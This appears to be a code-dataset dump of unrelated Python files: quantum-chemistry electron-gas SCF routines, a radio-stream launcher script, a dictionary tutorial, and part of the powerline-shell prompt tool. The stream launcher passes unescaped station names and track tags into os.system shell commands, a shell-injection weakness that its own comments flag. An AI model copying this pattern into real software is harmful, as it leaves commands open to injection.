            fo = ft_utils.ff(beta, en, self.mu)
            fv = ft_utils.ffv(beta, en, self.mu)
            vec = dvec*fo*fv
            tmat = self.g_hcore()
            E1_2 = -einsum('ijij,i,j->', V, vec, fo)
            E1_1 = -einsum('ii,i->', tmat - numpy.diag(en), vec)
            return E1_2 + E1_1
        else:
            logging.warning("Derivative of MP1 energy is zero at 0K")
            return 0.0

    def g_mp1_den(self):
        """Orbital-resolved derivative of the MP1 energy (general orbitals)."""
        if self.T > 0:
            V = self.g_aint_tot()
            beta = 1.0 / self.T
            en = self.g_energies_tot()
            fo = ft_utils.ff(beta, en, self.mu)
            fv = ft_utils.ffv(beta, en, self.mu)
            vec = fo*fv
            tmat = self.g_hcore()
            E1_2 = -beta*einsum('ijij,i,j->i', V, vec, fo)
            E1_1 = -beta*einsum('ii,i->i', tmat - numpy.diag(en), vec)
            return E1_1 + E1_2
        else:
            logging.warning("Derivative of MP1 energy is zero at 0K")
            return numpy.zeros((self.g_energies_tot().shape))

    def r_energies(self):
        """Restricted occupied/virtual orbital energies (zero T only)."""
        if self.T > 0.0:
            raise Exception("Undefined ov blocks at FT")
        if self.Na != self.Nb:
            raise Exception("UEG system is not restricted")
        F = self.r_fock()
        na = int(self.Na)
        assert(na == int(self.Nb))
        eo = F.oo.diagonal()
        ev = F.vv.diagonal()
        if self.madelung == "orb":
            # bug fix: ndarray.diagonal() returns a read-only view, so the
            # original in-place `eo -= ...` raised ValueError; shift into a
            # fresh array instead
            eo = eo - self._mconst
        return (eo, ev)

    def u_energies(self):
        """Unrestricted occupied/virtual orbital energies (zero T only)."""
        fa, fb = self.u_fock()
        eoa = fa.oo.diagonal()
        eva = fa.vv.diagonal()
        eob = fb.oo.diagonal()
        evb = fb.vv.diagonal()
        if self.madelung == "orb":
            # see r_energies: diagonal() views are read-only, avoid in-place
            eoa = eoa - self._mconst
            eob = eob - self._mconst
        return (eoa, eva, eob, evb)

    def g_energies(self):
        """Spin-orbital occupied/virtual energies (zero T only)."""
        if self.T > 0.0:
            raise Exception("Undefined ov blocks at FT")
        d = self.g_energies_tot()
        nbsf = self.basis.get_nbsf()
        na = int(self.Na)
        nb = int(self.Nb)
        eoa = d[:na]
        eva = d[na:nbsf]
        eob = d[nbsf:nbsf+nb]
        evb = d[-(nbsf-nb):]
        eo = numpy.hstack((eoa, eob))
        ev = numpy.hstack((eva, evb))
        if self.madelung == "orb":
            eo = eo - self._mconst
        return (eo, ev)

    def r_energies_tot(self):
        """All restricted orbital energies including the mean-field shift."""
        # bug fix: numpy.asarray can alias self.basis.Es when it is already
        # an ndarray, in which case the in-place `+=` below would corrupt
        # the basis energies on every call; force a copy
        e = numpy.array(self.basis.Es, dtype=float)
        n = e.shape[0]
        V = self.r_int_tot()
        Vd = V[numpy.ix_(numpy.arange(n), self.oidx,
                         numpy.arange(n), self.oidx)]
        Vx = V[numpy.ix_(numpy.arange(n), self.oidx,
                         self.oidx, numpy.arange(n))]
        e += 2*numpy.einsum('pipi->p', Vd) - numpy.einsum('piip->p', Vx)
        return e

    def u_energies_tot(self):
        """Alpha and beta total orbital energies (same spatial spectrum)."""
        e = self.r_energies_tot()
        return e, e.copy()

    def g_energies_tot(self):
        """Spin-orbital energies: alpha block followed by beta block."""
        ea, eb = self.u_energies_tot()
        return numpy.hstack((ea, eb))

    def r_fock(self):
        """Restricted Fock matrix in o/v blocks (zero T only)."""
        if self.T > 0.0:
            raise Exception("Undefined ov blocks at FT")
        F = self.r_hcore()
        V = self.r_int_tot()
        n = F.shape[0]
        Vd = V[numpy.ix_(numpy.arange(n), self.oidx,
                         numpy.arange(n), self.oidx)]
        Vx = V[numpy.ix_(numpy.arange(n), self.oidx,
                         self.oidx, numpy.arange(n))]
        F = F + 2*einsum('piri->pr', Vd) - einsum('piir->pr', Vx)
        Foo = F[numpy.ix_(self.oidx, self.oidx)]
        Fvv = F[numpy.ix_(self.vidx, self.vidx)]
        Fov = F[numpy.ix_(self.oidx, self.vidx)]
        Fvo = F[numpy.ix_(self.vidx, self.oidx)]
        return one_e_blocks(Foo, Fov, Fvo, Fvv)

    def u_fock(self):
        """Unrestricted Fock matrices in o/v blocks (zero T only);
        alpha and beta are identical for the spin-restricted UEG."""
        if self.T > 0.0:
            raise Exception("Undefined ov blocks at FT")
        F = self.r_hcore()
        n = F.shape[0]
        oidx = self.oidx
        vidx = self.vidx
        V = self.r_int_tot()
        Vd = V[numpy.ix_(numpy.arange(n), oidx, numpy.arange(n), oidx)]
        Vx = V[numpy.ix_(numpy.arange(n), oidx, oidx, numpy.arange(n))]
        F = F + 2*einsum('piri->pr', Vd) - einsum('piir->pr', Vx)
        Foo = F[numpy.ix_(oidx, oidx)]
        Fvv = F[numpy.ix_(vidx, vidx)]
        Fov = F[numpy.ix_(oidx, vidx)]
        Fvo = F[numpy.ix_(vidx, oidx)]
        Fa = one_e_blocks(Foo, Fov, Fvo, Fvv)
        Fb = one_e_blocks(Foo, Fov, Fvo, Fvv)
        return Fa, Fb

    def g_fock(self):
        """Spin-orbital Fock matrix in o/v blocks (zero T only)."""
        if self.T > 0.0:
            raise Exception("Undefined ov blocks at FT")
        F = self.g_hcore()
        n = F.shape[0]
        goidx = self.goidx
        gvidx = self.gvidx
        V = self.g_aint_tot()
        V = V[numpy.ix_(numpy.arange(n), goidx, numpy.arange(n), goidx)]
        F = F + einsum('piri->pr', V)
        Foo = F[numpy.ix_(goidx, goidx)]
        Fvv = F[numpy.ix_(gvidx, gvidx)]
        Fov = F[numpy.ix_(goidx, gvidx)]
        Fvo = F[numpy.ix_(gvidx, goidx)]
        return one_e_blocks(Foo, Fov, Fvo, Fvv)

    def r_fock_tot(self):
        """Full restricted Fock matrix (thermal density at finite T)."""
        T = self.r_hcore()
        d = self.r_energies_tot()
        n = d.shape[0]
        if self.T > 0.0:
            beta = 1.0 / self.T
            fo = ft_utils.ff(beta, d, self.mu)
            I = numpy.identity(n)
            den = einsum('pi,i,qi->pq', I, fo, I)
        else:
            # int(): self.N can be a float when computed from occupations
            to = numpy.zeros((n, int(self.N)))
            i = 0
            for p in range(n):
                if d[p] < self.mu:
                    to[p, i] = 1.0
                    i = i+1
            den = einsum('pi,qi->pq', to, to)
        V = self.r_int_tot()
        JK = 2*einsum('prqs,rs->pq', V, den) - einsum('prsq,rs->pq', V, den)
        return T + JK

    def u_fock_tot(self):
        """Full unrestricted Fock matrices (thermal density at finite T)."""
        Ta, Tb = self.basis.build_u_ke_matrix()
        da, db = self.u_energies_tot()
        na = da.shape[0]
        nb = db.shape[0]
        if self.T > 0.0:
            beta = 1.0 / self.T
            foa = ft_utils.ff(beta, da, self.mu)
            fob = ft_utils.ff(beta, db, self.mu)
            Ia = numpy.identity(na)
            Ib = numpy.identity(nb)
            dena = einsum('pi,i,qi->pq', Ia, foa, Ia)
            denb = einsum('pi,i,qi->pq', Ib, fob, Ib)
        else:
            dena = numpy.zeros((na, na))
            denb = numpy.zeros((nb, nb))
            # bug fix: self.oidx is an index array, not a count --
            # range(self.oidx) raised TypeError; iterate the indices
            for i in self.oidx:
                dena[i, i] = 1.0
                denb[i, i] = 1.0
        Va, Vb, Vabab = self.u_aint_tot()
        JKa = einsum('prqs,rs->pq', Va, dena)
        JKa += einsum('prqs,rs->pq', Vabab, denb)
        JKb = einsum('prqs,rs->pq', Vb, denb)
        JKb += einsum('prqs,rs->pq', Vabab, dena)
        return (Ta + JKa), (Tb + JKb)

    def g_fock_tot(self):
        """Full spin-orbital Fock matrix (thermal density at finite T)."""
        T = self.basis.build_g_ke_matrix()
        d = self.g_energies_tot()
        n = d.shape[0]
        if self.T > 0.0:
            beta = 1.0 / self.T
            fo = ft_utils.ff(beta, d, self.mu)
            I = numpy.identity(n)
            den = einsum('pi,i,qi->pq', I, fo, I)
        else:
            # int(): self.N can be a float when computed from occupations
            to = numpy.zeros((n, int(self.N)))
            i = 0
            for p in range(n):
                if d[p] < self.mu:
                    to[p, i] = 1.0
                    i = i+1
            den = einsum('pi,qi->pq', to, to)
        V = self.g_aint_tot()
        JK = einsum('prqs,rs->pq', V, den)
        return T + JK

    def u_fock_d_tot(self, dveca, dvecb):
        """Derivative of the unrestricted Fock matrices with respect to
        occupation perturbations (dveca, dvecb); zero at 0K."""
        da, db = self.u_energies_tot()
        na = da.shape[0]
        nb = db.shape[0]
        if self.T == 0.0:
            logging.warning("Occupations derivatives are zero at 0K")
            return numpy.zeros((na, na)), numpy.zeros((nb, nb))
        beta = 1.0 / self.T
        foa = ft_utils.ff(beta, da, self.mu)
        fva = ft_utils.ffv(beta, da, self.mu)
        veca = dveca*foa*fva
        fob = ft_utils.ff(beta, db, self.mu)
        fvb = ft_utils.ffv(beta, db, self.mu)
        vecb = dvecb*fob*fvb
        Ia = numpy.identity(na)
        Ib = numpy.identity(nb)
        dena = einsum('pi,i,qi->pq', Ia, veca, Ia)
        denb = einsum('pi,i,qi->pq', Ib, vecb, Ib)
        Va, Vb, Vabab = self.u_aint_tot()
        JKa = einsum('prqs,rs->pq', Va, dena)
        JKa += einsum('prqs,rs->pq', Vabab, denb)
        JKb = einsum('prqs,rs->pq', Vb, denb)
        # NOTE(review): this contraction ('prqs,pq->rs') differs from the
        # 'prqs,rs->pq' form used for the same cross term in u_fock_tot;
        # one of the two is likely inconsistent -- confirm against the
        # Vabab index convention before changing either.
        JKb += einsum('prqs,pq->rs', Vabab, dena)
        return -JKa, -JKb

    def u_fock_d_den(self):
        """Occupation-resolved derivative of the unrestricted Fock matrices."""
        da, db = self.u_energies_tot()
        na = da.shape[0]
        nb = db.shape[0]
        if self.T == 0.0:
            logging.warning("Occupations derivatives are zero at 0K")
            return numpy.zeros((na, na)), numpy.zeros((nb, nb))
        beta = 1.0 / self.T
        foa = ft_utils.ff(beta, da, self.mu)
        fva = ft_utils.ffv(beta, da, self.mu)
        veca = foa*fva
        fob = ft_utils.ff(beta, db, self.mu)
        fvb = ft_utils.ffv(beta, db, self.mu)
        vecb = fob*fvb
        Va, Vb, Vabab = self.u_aint_tot()
        JKaa = einsum('piqi,i->pqi', Va, veca)
        JKab = einsum('piqi,i->pqi', Vabab, vecb)
        JKbb = einsum('piqi,i->pqi', Vb, vecb)
        JKba = einsum('iris,i->rsi', Vabab, veca)
        return JKaa, JKab, JKbb, JKba

    def g_fock_d_tot(self, dvec):
        """Derivative of the spin-orbital Fock matrix along dvec."""
        d = self.g_energies_tot()
        n = d.shape[0]
        if self.T == 0.0:
            logging.warning("Occupations derivatives are zero at 0K")
            return numpy.zeros((n, n))
        beta = 1.0 / self.T
        fo = ft_utils.ff(beta, d, self.mu)
        fv = ft_utils.ffv(beta, d, self.mu)
        vec = dvec*fo*fv
        I = numpy.identity(n)
        den = einsum('pi,i,qi->pq', I, vec, I)
        V = self.g_aint_tot()
        JK = einsum('prqs,rs->pq', V, den)
        return -JK

    def g_fock_d_den(self):
        """Occupation-resolved derivative of the spin-orbital Fock matrix."""
        d = self.g_energies_tot()
        n = d.shape[0]
        if self.T == 0.0:
            logging.warning("Occupations derivatives are zero at 0K")
            return numpy.zeros((n, n))
        beta = 1.0 / self.T
        fo = ft_utils.ff(beta, d, self.mu)
        fv = ft_utils.ffv(beta, d, self.mu)
        vec = fo*fv
        V = self.g_aint_tot()
        JK = einsum('piqi,i->pqi', V, vec)
        return JK

    def r_hcore(self):
        """Core (kinetic) Hamiltonian: diagonal of plane-wave energies."""
        return numpy.diag(numpy.asarray(self.basis.Es))

    def g_hcore(self):
        """Spin-orbital core Hamiltonian."""
        return self.basis.build_g_ke_matrix()

    def u_aint(self):
        """Antisymmetrized two-electron integrals in o/v blocks
        (aa, bb and abab spin cases); zero T only."""
        if self.T > 0.0:
            raise Exception("Undefined ov blocks at FT")
        Va, Vb, Vabab = self.u_aint_tot()
        # alpha and beta share the same spatial occupations
        oaidx = self.oidx
        vaidx = self.vidx
        obidx = self.oidx
        vbidx = self.vidx
        Vvvvv = Va[numpy.ix_(vaidx, vaidx, vaidx, vaidx)]
        Vvvvo = Va[numpy.ix_(vaidx, vaidx, vaidx, oaidx)]
        Vvovv = Va[numpy.ix_(vaidx, oaidx, vaidx, vaidx)]
        Vvvoo = Va[numpy.ix_(vaidx, vaidx, oaidx, oaidx)]
        Vvovo = Va[numpy.ix_(vaidx, oaidx, vaidx, oaidx)]
        Voovv = Va[numpy.ix_(oaidx, oaidx, vaidx, vaidx)]
        Vvooo = Va[numpy.ix_(vaidx, oaidx, oaidx, oaidx)]
        Vooov = Va[numpy.ix_(oaidx, oaidx, oaidx, vaidx)]
        Voooo = Va[numpy.ix_(oaidx, oaidx, oaidx, oaidx)]
        Va = two_e_blocks(
            vvvv=Vvvvv, vvvo=Vvvvo,
            vovv=Vvovv, vvoo=Vvvoo,
            vovo=Vvovo, oovv=Voovv,
            vooo=Vvooo, ooov=Vooov,
            oooo=Voooo)
        Vvvvv = Vb[numpy.ix_(vbidx, vbidx, vbidx, vbidx)]
        Vvvvo = Vb[numpy.ix_(vbidx, vbidx, vbidx, obidx)]
        Vvovv = Vb[numpy.ix_(vbidx, obidx, vbidx, vbidx)]
        Vvvoo = Vb[numpy.ix_(vbidx, vbidx, obidx, obidx)]
        Vvovo = Vb[numpy.ix_(vbidx, obidx, vbidx, obidx)]
        Voovv = Vb[numpy.ix_(obidx, obidx, vbidx, vbidx)]
        Vvooo = Vb[numpy.ix_(vbidx, obidx, obidx, obidx)]
        Vooov = Vb[numpy.ix_(obidx, obidx, obidx, vbidx)]
        Voooo = Vb[numpy.ix_(obidx, obidx, obidx, obidx)]
        Vb = two_e_blocks(
            vvvv=Vvvvv, vvvo=Vvvvo,
            vovv=Vvovv, vvoo=Vvvoo,
            vovo=Vvovo, oovv=Voovv,
            vooo=Vvooo, ooov=Vooov,
            oooo=Voooo)
        # mixed-spin block needs all 16 o/v combinations
        Vvvvv = Vabab[numpy.ix_(vaidx, vbidx, vaidx, vbidx)]
        Vvvvo = Vabab[numpy.ix_(vaidx, vbidx, vaidx, obidx)]
        Vvvov = Vabab[numpy.ix_(vaidx, vbidx, oaidx, vbidx)]
        Vvovv = Vabab[numpy.ix_(vaidx, obidx, vaidx, vbidx)]
        Vovvv = Vabab[numpy.ix_(oaidx, vbidx, vaidx, vbidx)]
        Vvvoo = Vabab[numpy.ix_(vaidx, vbidx, oaidx, obidx)]
        Vvoov = Vabab[numpy.ix_(vaidx, obidx, oaidx, vbidx)]
        Vvovo = Vabab[numpy.ix_(vaidx, obidx, vaidx, obidx)]
        Vovvo = Vabab[numpy.ix_(oaidx, vbidx, vaidx, obidx)]
        Vovov = Vabab[numpy.ix_(oaidx, vbidx, oaidx, vbidx)]
        Voovv = Vabab[numpy.ix_(oaidx, obidx, vaidx, vbidx)]
        Vvooo = Vabab[numpy.ix_(vaidx, obidx, oaidx, obidx)]
        Vovoo = Vabab[numpy.ix_(oaidx, vbidx, oaidx, obidx)]
        Voovo = Vabab[numpy.ix_(oaidx, obidx, vaidx, obidx)]
        Vooov = Vabab[numpy.ix_(oaidx, obidx, oaidx, vbidx)]
        Voooo = Vabab[numpy.ix_(oaidx, obidx, oaidx, obidx)]
        Vabab = two_e_blocks_full(
            vvvv=Vvvvv, vvvo=Vvvvo,
            vvov=Vvvov, vovv=Vvovv,
            ovvv=Vovvv, vvoo=Vvvoo,
            vovo=Vvovo, ovvo=Vovvo,
            voov=Vvoov, ovov=Vovov,
            oovv=Voovv, vooo=Vvooo,
            ovoo=Vovoo, oovo=Voovo,
            ooov=Vooov, oooo=Voooo)
        return Va, Vb, Vabab

    def g_aint(self, code=0):
        """Antisymmetrized spin-orbital integrals in o/v blocks; zero T only.

        code selects a single block (1..9) or all blocks (0)."""
        if self.T > 0.0:
            raise Exception("Undefined ov blocks at FT")
        V = self.g_aint_tot()
        Vvvvv = None
        Vvvvo = None
        Vvovv = None
        Vvvoo = None
        Vvovo = None
        Voovv = None
        Vvooo = None
        Vooov = None
        Voooo = None
        goidx = self.goidx
        gvidx = self.gvidx
        if code == 0 or code == 1:
            Vvvvv = V[numpy.ix_(gvidx, gvidx, gvidx, gvidx)]
        if code == 0 or code == 2:
            Vvvvo = V[numpy.ix_(gvidx, gvidx, gvidx, goidx)]
        if code == 0 or code == 3:
            Vvovv = V[numpy.ix_(gvidx, goidx, gvidx, gvidx)]
        if code == 0 or code == 4:
            Vvvoo = V[numpy.ix_(gvidx, gvidx, goidx, goidx)]
        if code == 0 or code == 5:
            Vvovo = V[numpy.ix_(gvidx, goidx, gvidx, goidx)]
        if code == 0 or code == 6:
            Voovv = V[numpy.ix_(goidx, goidx, gvidx, gvidx)]
        if code == 0 or code == 7:
            Vvooo = V[numpy.ix_(gvidx, goidx, goidx, goidx)]
        if code == 0 or code == 8:
            Vooov = V[numpy.ix_(goidx, goidx, goidx, gvidx)]
        if code == 0 or code == 9:
            Voooo = V[numpy.ix_(goidx, goidx, goidx, goidx)]
        return two_e_blocks(
            vvvv=Vvvvv, vvvo=Vvvvo,
            vovv=Vvovv, vvoo=Vvvoo,
            vovo=Vvovo, oovv=Voovv,
            vooo=Vvooo, ooov=Vooov,
            oooo=Voooo)

    def u_aint_tot(self):
        """Full antisymmetrized two-electron integrals (aa, bb, abab)."""
        return self.basis.build_u2e_matrix()

    def g_aint_tot(self):
        """Full antisymmetrized spin-orbital two-electron integrals."""
        return self.basis.build_g2e_matrix()

    def r_int_tot(self):
        """Full restricted (spatial) two-electron integrals."""
        return self.basis.build_r2e_matrix()

    def g_int_tot(self):
        """Full spin-orbital two-electron integrals, not antisymmetrized."""
        return self.basis.build_g2e_matrix(anti=False)
class ueg_scf_system(UEGSCFSystem):
    """Deprecated alias for :class:`UEGSCFSystem`, kept for old callers."""
    def __init__(self, T, L, Emax, mu=None, na=None, nb=None,
                 norb=None, orbtype='u', madelung=None, naref=None):
        # Warn on every construction, then defer to the new class.
        logging.warning("This class is deprecated, use UEGSCFSystem instead")
        super(ueg_scf_system, self).__init__(
            T, L, Emax, mu=mu, na=na, nb=nb, norb=norb,
            orbtype=orbtype, madelung=madelung, naref=naref)
| 36.035032 | 77 | 0.506628 |
795538701972a039f912b478252ddc9959982731 | 2,972 | py | Python | streams.py | exu0/play-streams | 0e8cbfe4e5f09d57680afef3bc2a6b9de9ff0e4b | [
"MIT"
] | null | null | null | streams.py | exu0/play-streams | 0e8cbfe4e5f09d57680afef3bc2a6b9de9ff0e4b | [
"MIT"
] | null | null | null | streams.py | exu0/play-streams | 0e8cbfe4e5f09d57680afef3bc2a6b9de9ff0e4b | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import ConfigParser
import sys
import subprocess
import os
CONFIG_FILE = "config"
class Station:
    """One radio station entry: display name, stream URL and a flag saying
    whether the URL points at a playlist rather than a raw stream."""

    def __init__(self, name, url, playlist):
        self.name, self.url, self.playlist = name, url, playlist

    def __str__(self):
        return self.name
class Config:
    # Parses the ini-style config file: a [Global] section naming the player
    # script, working directory and station list, plus one section per station.
    # NOTE: Python 2 code (ConfigParser module name, print statements).
    def __init__(self, configFile):
        # "playlist" defaults to yes for stations that do not set it
        config = ConfigParser.ConfigParser(defaults = {"playlist" : "yes"})
        config.read(configFile)
        # index 0 is a dummy so station numbers given on argv start at 1
        self.stations = ["dummy"]
        try:
            stationNames = config.get("Global", "stations")
            self.dirName = config.get("Global", "dir").rstrip("/")+"/"
            self.player = config.get("Global", "player")
            for stationName in stationNames.split():
                if not config.has_section(stationName):
                    print "no section", stationName
                    continue
                displayName = config.get(stationName, "name")
                url = config.get(stationName, "url")
                playlist = config.getboolean(stationName, "playlist")
                station = Station(displayName, url, playlist)
                self.stations.append(station)
        except Exception as e:
            # any missing option/section aborts the whole program
            print "ERROR Could not read config file "+configFile+":", str(e)
            exit(1)
def killOld(pidFile):
    """Terminate any previously started player processes.

    Reads one PID per line from *pidFile*, sends each one SIGTERM (15) and
    finally deletes the file.  A missing or unreadable pid file is not an
    error (nothing is playing); failures to kill (stale PIDs, foreign
    processes) are ignored.  Note: a malformed (non-integer) line will
    still raise ValueError, as before.
    """
    try:
        with open(pidFile, "r") as pidf:
            # (removed the unused `killed` flag from the original)
            for line in pidf.readlines():
                pid = int(line.strip())
                try:
                    os.kill(pid, 15)
                except Exception:
                    # process already gone or not ours -- ignore
                    pass
            os.remove(pidFile)
    except IOError:
        pass
def osd(message):
    # Flash *message* on screen via aosd_cat (on-screen display daemon).
    # NOTE(review): message is interpolated into a shell command without any
    # quoting/escaping -- station names containing shell metacharacters would
    # be interpreted by the shell; confirm inputs are trusted.
    cmd = 'echo '+message+' | /usr/bin/aosd_cat --font="Serif 30" -o 1000 -u 400 -R white -f 0 -p 4 -x -640 -y -20'
    os.system(cmd)
def showTag(config):
    # Show the currently playing station and track -- written by the player
    # into <dir>/station and <dir>/tag -- as a desktop notification.
    # Missing files (nothing playing) are reported via the py2 print below.
    stationFile = config.dirName+"station"
    tagFile = config.dirName+"tag"
    try:
        with open(stationFile) as sf:
            with open(tagFile) as tf:
                tag = tf.read()
                station = sf.read()
                # NOTE(review): unescaped shell interpolation, see osd()
                cmd = '/usr/bin/notify-send -i gnome-volume-control "'+station+'" "'+tag+'"'
                os.system(cmd)
    except IOError as e:
        print e
if __name__ == "__main__":
    # Usage: streams.py [N] -- N=0 stops playback, N>=1 plays station N
    # from the config; with no argument, show the current station/track.
    path = os.path.dirname(os.path.realpath(__file__))
    config = Config(path+"/"+CONFIG_FILE)
    if len(sys.argv) != 2:
        showTag(config)
        exit(0)
    try:
        num = int(sys.argv[1])
    except ValueError:
        exit(1)
    pidFile = config.dirName+"pid"
    if num == 0:
        # stop whatever is playing and announce it
        killOld(pidFile)
        osd("off")
        exit(0)
    # stop the old player, then spawn the configured player script detached
    station = config.stations[num]
    killOld(pidFile)
    subprocess.Popen(["/usr/bin/python", path+"/"+config.player, "-s", station.name, station.url, "-d", config.dirName], stderr = sys.stderr, stdout = sys.stdout)
osd(station.name) | 31.284211 | 162 | 0.534657 |
795538852163022525f780c5c77ca505a20c4c72 | 172 | py | Python | des097.py | LeonardoPereirajr/Curso_em_video_Python | 9d8a97ba3389c8e86b37dfd089fab5d04adc146d | [
"MIT"
] | null | null | null | des097.py | LeonardoPereirajr/Curso_em_video_Python | 9d8a97ba3389c8e86b37dfd089fab5d04adc146d | [
"MIT"
] | null | null | null | des097.py | LeonardoPereirajr/Curso_em_video_Python | 9d8a97ba3389c8e86b37dfd089fab5d04adc146d | [
"MIT"
] | null | null | null | def escreva(msg):
    """Print *msg* inside a '^' banner sized to the message width."""
    # banner is four characters wider than the message
    c = len(msg) + 4
    print(c * '^')
    print(f' {msg} ')
    print(c * '^')
# Main program ("PRINCIPAL")
escreva('LEONARDO PEREIRA junior')
print()
| 12.285714 | 35 | 0.488372 |
795539719af164627911840332d64c624d57efad | 1,412 | py | Python | Chapter_3/Dictionary/dictionary.py | random-forest-ai/python_course | cd6b7f30e1932312c05178e6bb66cc95c72fe6c1 | [
"MIT"
] | null | null | null | Chapter_3/Dictionary/dictionary.py | random-forest-ai/python_course | cd6b7f30e1932312c05178e6bb66cc95c72fe6c1 | [
"MIT"
] | null | null | null | Chapter_3/Dictionary/dictionary.py | random-forest-ai/python_course | cd6b7f30e1932312c05178e6bb66cc95c72fe6c1 | [
"MIT"
] | null | null | null | if __name__ == '__main__':
    # Tutorial script: dictionary creation, update, deletion and iteration.
    # Declare
    # x = {}
    # x = {"Apple": 1, 10000: [1,2,3]}
    x = dict( [("London", 9623), ("New York", 12947)] ) # dict(list of tuples)
    # x = {[1,2,3]: 100} # Not OK, keys should be immutable
    # x = {100: [1,2,3]}
    # x = {2: 4, 2: 6}
    x = {-2: 4, 2: 4}
    # Base dictionary used by the examples below (distances in km)
    distance_from_HK = {"London": 9623, "New York": 12947,
                        "Lima": 18349, "Singapore": 2587}
    # distance_from_HK["London"]
    # distance_from_HK["Taipei"]
    # distance_from_HK.get("London")
    # distance_from_HK.get("Taipei")
    # Insert new entries (assignment and update with another dict)
    distance_from_HK["Vienna"] = 8729
    distance_from_HK.update({"Londres": 9623, "Wien": 8729})
    distance_from_HK["Istanbull"] = 80170
    # Modify
    distance_from_HK["Istanbull"] = 8017
    # Delete: del by key, pop returns the value, popitem removes the
    # last-inserted pair
    del distance_from_HK["Istanbull"]
    distance_from_HK["Istanbul"] = 8017
    val = distance_from_HK.pop("Wien")
    print(val)
    entry = distance_from_HK.popitem()
    print(entry)
    # Keys, values, items
    keys = distance_from_HK.keys()
    values = distance_from_HK.values()
    items = distance_from_HK.items()
    # Iterating through Dict
    # for city in distance_from_HK:
    #     print(city, end = " ")
    # for distance in distance_from_HK.values():
    #     print(distance, end = " ")
    for city, distance in distance_from_HK.items():
        print("The distance from Hong Kong to {} is: {} km".format(city, distance)) | 27.686275 | 83 | 0.594193
795539a6ae0fa802f64e8ce7dcd0562302fd788b | 5,241 | py | Python | .bash/powerline-shell/powerline_shell_base.py | chrislaskey/.dot-files | 44be2364f2824a2c70300f7c0f2963a592c7083e | [
"MIT"
] | null | null | null | .bash/powerline-shell/powerline_shell_base.py | chrislaskey/.dot-files | 44be2364f2824a2c70300f7c0f2963a592c7083e | [
"MIT"
] | null | null | null | .bash/powerline-shell/powerline_shell_base.py | chrislaskey/.dot-files | 44be2364f2824a2c70300f7c0f2963a592c7083e | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import argparse
import os
import sys
# True when running under Python 3 (selects str vs bytes in Powerline.draw)
py3 = sys.version_info.major == 3
def warn(msg):
    # Prefix warnings so they are identifiable in the shell prompt output
    print('[powerline-bash] ', msg)
class Powerline:
    """Builds a powerline-style shell prompt out of colored segments."""
    # Per-mode prompt glyphs: 'patched' needs a powerline-patched font,
    # 'compatible' uses plain unicode, 'flat' draws no separators at all.
    symbols = {
        'compatible': {
            'lock': 'RO',
            'network': 'SSH',
            'separator': u'\u25B6',
            'separator_thin': u'\u276F'
        },
        'patched': {
            'lock': u'\uE0A2',
            'network': u'\uE0A2',
            'separator': u'\uE0B0',
            'separator_thin': u'\uE0B1'
        },
        'flat': {
            'lock': '',
            'network': '',
            'separator': '',
            'separator_thin': ''
        },
    }
    # How each shell wants raw escape codes wrapped so that prompt length
    # is computed correctly ('bare' leaves them unwrapped).
    color_templates = {
        'bash': '\\[\\e%s\\]',
        'zsh': '%%{%s%%}',
        'bare': '%s',
    }
    def __init__(self, args, cwd):
        self.args = args
        self.cwd = cwd
        mode, shell = args.mode, args.shell
        self.color_template = self.color_templates[shell]
        self.reset = self.color_template % '[0m'
        self.lock = Powerline.symbols[mode]['lock']
        self.network = Powerline.symbols[mode]['network']
        self.separator = Powerline.symbols[mode]['separator']
        self.separator_thin = Powerline.symbols[mode]['separator_thin']
        self.segments = []
    def color(self, prefix, code):
        # Wrap a 256-color escape; code=None means "no color" (empty string)
        if code is None:
            return ''
        else:
            return self.color_template % ('[%s;5;%sm' % (prefix, code))
    def fgcolor(self, code):
        # 38 = set foreground in 256-color mode
        return self.color('38', code)
    def bgcolor(self, code):
        # 48 = set background in 256-color mode
        return self.color('48', code)
    def append(self, content, fg, bg, separator=None, separator_fg=None):
        # Each segment tuple: (text, fg, bg, separator glyph, separator fg)
        self.segments.append((content, fg, bg,
            separator if separator is not None else self.separator,
            separator_fg if separator_fg is not None else bg))
    def draw(self):
        # Concatenate all segments and reset colors at the end
        text = (''.join(self.draw_segment(i) for i in range(len(self.segments)))
            + self.reset) + ' '
        if py3:
            return text
        else:
            return text.encode('utf-8')
    def draw_segment(self, idx):
        segment = self.segments[idx]
        next_segment = self.segments[idx + 1] if idx < len(self.segments)-1 else None
        # The separator is drawn on the NEXT segment's background so the
        # arrow glyph appears to cut into it
        return ''.join((
            self.fgcolor(segment[1]),
            self.bgcolor(segment[2]),
            segment[0].lstrip(),
            self.bgcolor(next_segment[2]) if next_segment else self.reset,
            self.fgcolor(segment[4]),
            segment[3]))
def get_valid_cwd():
    """ We check if the current working directory is valid or not. Typically
        happens when you checkout a different branch on git that doesn't have
        this directory.
        We return the original cwd because the shell still considers that to be
        the working directory, so returning our guess will confuse people
    """
    # Prefer the PWD environment variable. Python's os.getcwd function follows
    # symbolic links, which is undesirable. But if PWD is not set then fall
    # back to this func
    try:
        cwd = os.getenv('PWD') or os.getcwd()
    except OSError:
        # bug fix: was a bare `except:` (which also swallowed SystemExit and
        # KeyboardInterrupt); os.getcwd raises OSError when the directory has
        # been deleted out from under us, and os.getenv never raises.
        warn("Your current directory is invalid. If you open a ticket at " +
            "https://github.com/milkbikis/powerline-shell/issues/new " +
            "we would love to help fix the issue.")
        sys.stdout.write("> ")
        sys.exit(1)
    # Walk up the path until an existing ancestor is found, purely to be
    # able to warn with the lowest valid directory; cwd itself is returned.
    parts = cwd.split(os.sep)
    up = cwd
    while parts and not os.path.exists(up):
        parts.pop()
        up = os.sep.join(parts)
    if cwd != up:
        warn("Your current directory is invalid. Lowest valid directory: "
            + up)
    return cwd
if __name__ == "__main__":
    # Command-line front end: every option maps onto a prompt feature.
    arg_parser = argparse.ArgumentParser()
    arg_parser.add_argument('--cwd-mode', action='store',
        help='How to display the current directory', default='fancy',
        choices=['fancy', 'plain', 'dironly'])
    arg_parser.add_argument('--cwd-only', action='store_true',
        help='Deprecated. Use --cwd-mode=dironly')
    arg_parser.add_argument('--cwd-max-depth', action='store', type=int,
        default=5, help='Maximum number of directories to show in path')
    arg_parser.add_argument('--cwd-max-dir-size', action='store', type=int,
        help='Maximum number of letters displayed for each directory in the path')
    arg_parser.add_argument('--colorize-hostname', action='store_true',
        help='Colorize the hostname based on a hash of itself.')
    arg_parser.add_argument('--mode', action='store', default='patched',
        help='The characters used to make separators between segments',
        choices=['patched', 'compatible', 'flat'])
